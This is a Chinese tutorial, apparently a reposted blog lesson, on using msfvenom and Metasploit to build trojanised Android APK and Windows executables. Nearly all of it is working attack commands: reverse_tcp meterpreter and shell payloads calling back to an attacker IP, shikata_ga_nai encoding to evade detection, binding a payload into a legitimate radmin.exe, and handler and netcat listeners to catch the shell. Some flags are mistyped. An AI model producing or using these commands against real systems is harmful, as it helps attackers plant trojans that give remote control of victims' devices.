6.Metasploit生成apk攻击Android实例

Metasploit进阶第四讲 生成Android  apk文件

01  msfvenom基本参数

msfvenom介绍

承接上回,staged/unstage payload如何利用?

msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。

msfvenom基本参数

msfvenom  -h

扫描二维码关注公众号,回复: 6717592 查看本文章

-p        ->指定payload

-1        ->列出所有可用项

-f         ->指定文件输出格式

-e        ->指定编码格式

-a        ->选择架构平台

-o        ->选择文件输出路径,包含文件名

-s         ->指定生成的payload最大大小

-b        ->避免使用的字符

-I         ->指定编码次数

-c         ->添加自己的shellcode

-xxxx.exc   -k    ->捆绑文件到xxx.cxc

以下使用msfvenom分别是什么意思?

Msfvenom   -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-b ‘\×00xff' –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe

msfvenom生成apk文件

staged payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

R>/var/www/html/Lliang.apk

metasploit:

use exploit/multi/handler                  加载模块

set payload android/meterpreter/reverse_tcp      选择Payload

set LHOST10.1.1.169这里的地址设置成我

们刚配置木马的IP地址

set LPORT4545这里的端口设置成刚才我们

配置木马所监听的端口

unstage payload:

 

msfvenom  –p  windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545

-f exe –o /var/www/html/shell-stageless.exe

metasploit:

use exploit/multi/handler加载模块

set payload windows/shell_reverse_tcp 选择Payload

unstage payload:

msfvenom  -p  windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545     -f exe  -o  /var/www/html/shell-stageless.exe

 netcat:在两台电脑之润建立链接并返回两个数据流

nc  -lyp  4545    -监听4545端口

-v/-vw   显示指令执行过程

-l  使用监听模式,管控传入的资料

-p   设置本地主机使用的通信端口

staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload

猜你喜欢

转载自www.cnblogs.com/lvwuwa/p/11129043.html